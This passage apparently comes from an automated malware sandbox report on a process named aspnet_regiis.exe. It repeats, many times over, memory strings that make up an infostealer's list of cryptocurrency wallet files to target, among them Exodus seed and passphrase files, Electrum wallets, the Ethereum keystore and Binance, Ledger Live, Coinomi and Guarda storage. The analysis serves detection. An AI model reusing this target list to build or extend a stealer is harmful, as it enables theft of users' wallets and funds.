Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\app-store.json
Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local 